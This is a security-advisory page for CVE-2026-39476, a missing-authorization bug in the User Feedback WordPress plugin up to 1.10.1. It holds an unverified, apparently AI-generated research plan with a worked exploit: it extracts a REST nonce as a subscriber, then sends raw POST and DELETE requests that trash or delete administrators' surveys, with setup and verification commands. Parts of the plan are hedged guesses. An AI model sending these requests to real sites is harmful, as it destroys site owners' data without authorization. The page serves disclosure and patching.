WP-Safety
CVE-2026-39476

User Feedback <= 1.10.1 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
1.11.0
Patched in
29d
Time to patch

Description

The User Feedback plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.10.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.10.1
PublishedMarch 18, 2026
Last updatedApril 15, 2026
Affected pluginuserfeedback-lite

What Changed in the Fix

Changes introduced in v1.11.0

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v1.10.1
Browse source Download .zip
Patched v1.11.0
Browse source Download .zip
Research Plan
Unverified

# Vulnerability Research Plan: CVE-2026-39476 (User Feedback <= 1.10.1 - Missing Authorization) ## 1. Vulnerability Summary The **User Feedback** plugin for WordPress is vulnerable to **Missing Authorization** in its survey management functionality. The plugin exposes several administrative actions…

Show full research plan

Vulnerability Research Plan: CVE-2026-39476 (User Feedback <= 1.10.1 - Missing Authorization)

1. Vulnerability Summary

The User Feedback plugin for WordPress is vulnerable to Missing Authorization in its survey management functionality. The plugin exposes several administrative actions (such as trashing, publishing, or duplicating surveys) via its REST API without verifying if the authenticated user possesses the necessary administrative capabilities (manage_options). This allows any authenticated user, including those with Subscriber level access, to modify or delete surveys created by administrators.

Based on the provided source code in assets/vue/js/chunk-common.js (specifically module 0792), the plugin interacts with a REST API under a namespace (likely userfeedback/v1) to perform these actions.

2. Attack Vector Analysis

  • Endpoint: POST /wp-json/userfeedback/v1/surveys/trash (Inferred from JS function g)
  • HTTP Method: POST
  • Authentication: Required (Subscriber-level or higher)
  • Payload: JSON object containing an array of survey IDs to be trashed.
  • Nonce: A valid WordPress REST API nonce is required in the X-WP-Nonce header.
  • Preconditions: At least one survey must exist in the system for the attacker to target.

3. Code Flow

  1. Entry Point: The REST API endpoint userfeedback/v1/surveys/trash is registered in the backend (likely in a class handling REST routes).
  2. Missing Check: The permission_callback for this route is either missing or uses a weak check like is_user_logged_in() instead of current_user_can('manage_options').
  3. JS Trigger: In assets/vue/js/chunk-common.js, module 0792 defines the survey management functions:
    • g = e => n.post("surveys/trash", { survey_ids: e }) // Trashing
    • h = e => n.delete("surveys", { data: { survey_ids: e } }) // Permanent Delete
    • m = e => n.post("surveys/publish", { survey_ids: e }) // Publishing
  4. Backend Sink: The request reaches the survey controller, which performs database operations on the wp_userfeedback_surveys table (e.g., updating the status column to trash) without verifying the requester's authority.

4. Nonce Acquisition Strategy

The REST API requires a nonce for authenticated requests. The User Feedback plugin localizes its configuration and security tokens into a global JavaScript object.

  1. Identify Localization: The plugin enqueues its admin scripts and localizes data. Based on common patterns in this plugin, the data is likely in window.userfeedback.
  2. Creation of Content: The admin scripts load on User Feedback admin pages. A subscriber can access the /wp-admin/ dashboard but may not see the User Feedback menu. However, the script might still be localized.
  3. Extraction:
    • Navigate to /wp-admin/ as a Subscriber.
    • Use browser_eval to extract the nonce:
      browser_eval("window.userfeedback?.nonce || window.userfeedback_common?.nonce")
    • The exact key from localized scripts in this plugin is typically nonce within the userfeedback object.

5. Exploitation Strategy

Step 1: Discover Target Survey ID

The attacker needs the ID of a survey to trash. These can often be found by iterating IDs or checking frontend survey placements.

Step 2: Perform Unauthorized Trash Action

Use the http_request tool to send a POST request to the REST API.

Request:

POST /wp-json/userfeedback/v1/surveys/trash HTTP/1.1
Host: [TARGET_HOST]
X-WP-Nonce: [EXTRACTED_NONCE]
Content-Type: application/json

{
    "survey_ids": [1]
}

Step 3: Alternative - Permanent Deletion

Request:

DELETE /wp-json/userfeedback/v1/surveys HTTP/1.1
Host: [TARGET_HOST]
X-WP-Nonce: [EXTRACTED_NONCE]
Content-Type: application/json

{
    "survey_ids": [1]
}

6. Test Data Setup

  1. Install Plugin: Install User Feedback (userfeedback-lite) version 1.10.1.
  2. Create Survey: As Admin, create a feedback survey.
    • wp userfeedback create_survey --title="Target Survey" --status="publish" (or use the UI).
  3. Create Attacker: Create a user with the Subscriber role.
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  4. Confirm Survey ID:
    • wp db query "SELECT id, title FROM wp_userfeedback_surveys;"

7. Expected Results

  • Response: The server should return a 200 OK or 201 Created status with a JSON body confirming the surveys were processed (e.g., {"success": true}).
  • Database Impact: The record in wp_userfeedback_surveys for the target ID should have its status changed to trash or be removed entirely if the DELETE method was used.

8. Verification Steps

  1. Check Database Status:
    • wp db query "SELECT status FROM wp_userfeedback_surveys WHERE id = [ID]"
    • Successful exploit shows status = 'trash'.
  2. Check UI: Navigate to the User Feedback surveys page as Admin and verify the survey is in the "Trash" tab.

9. Alternative Approaches

If the REST API is not the direct target, the AJAX action identified in assets/vue/js/chunk-common.js module 0792 may be vulnerable:

  • Action: userfeedback_google_sheets_get_auth_url
  • Endpoint: /wp-admin/admin-ajax.php?action=userfeedback_google_sheets_get_auth_url
  • Impact: Unauthorized retrieval of authentication URLs for third-party integrations.

However, the survey modification via surveys/trash represents the most significant "Missing Authorization" impact for survey data integrity.

Research Findings
Static analysis — not yet PoC-verified

Summary

The User Feedback plugin for WordPress (up to version 1.10.1) fails to implement proper authorization checks on its REST API routes for survey management. This allows authenticated users with low-level privileges, such as Subscribers, to trash, delete, publish, or duplicate surveys by sending crafted requests to the plugin's API endpoints.

Vulnerable Code

// assets/vue/js/chunk-common.js - Module 0792 defines interactions with vulnerable REST endpoints
// These mappings correspond to administrative actions performed via the REST API
l=e=>n.post("surveys",e).then(e=>e.data),
c=e=>n.post(`surveys/${e}/duplicate`).then(e=>e.data),
u=e=>n.post("surveys/restore",{survey_ids:e}).then(e=>e.data),
d=e=>n.post("surveys/draft",{survey_ids:e}).then(e=>e.data),
m=e=>n.post("surveys/publish",{survey_ids:e}).then(e=>e.data),
g=e=>n.post("surveys/trash",{survey_ids:e}).then(e=>e.data),
h=e=>n.delete("surveys",{data:{survey_ids:e}}).then(e=>e.data)

Security Fix

Only in /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.11.0/assets/css: admin-exclusion-banner.css
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.10.1/assets/index.php /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.11.0/assets/index.php
--- /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.10.1/assets/index.php	2023-01-31 17:55:08.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.11.0/assets/index.php	2026-03-11 17:04:32.000000000 +0000
@@ -1,4 +1,8 @@
 <?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
 // Nothing to see here
 
 header( 'HTTP/1.0 403 Forbidden' );
Only in /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.11.0/assets/js: admin-exclusion-banner.js
... (truncated)

Exploit Outline

An attacker with Subscriber-level access can exploit this by first obtaining a valid WordPress REST API nonce, typically found in the localized 'userfeedback' JavaScript object on dashboard pages. By identifying the ID of an existing survey, the attacker can then send an authenticated POST request to '/wp-json/userfeedback/v1/surveys/trash' or a DELETE request to '/wp-json/userfeedback/v1/surveys' with the target survey ID in the 'survey_ids' array. Because the backend fails to verify the user's capabilities (missing manage_options check), the surveys will be trashed or deleted regardless of the attacker's actual permissions.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/8fb7241f-f7fc-48c0-8111-5ceceb156f9f?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database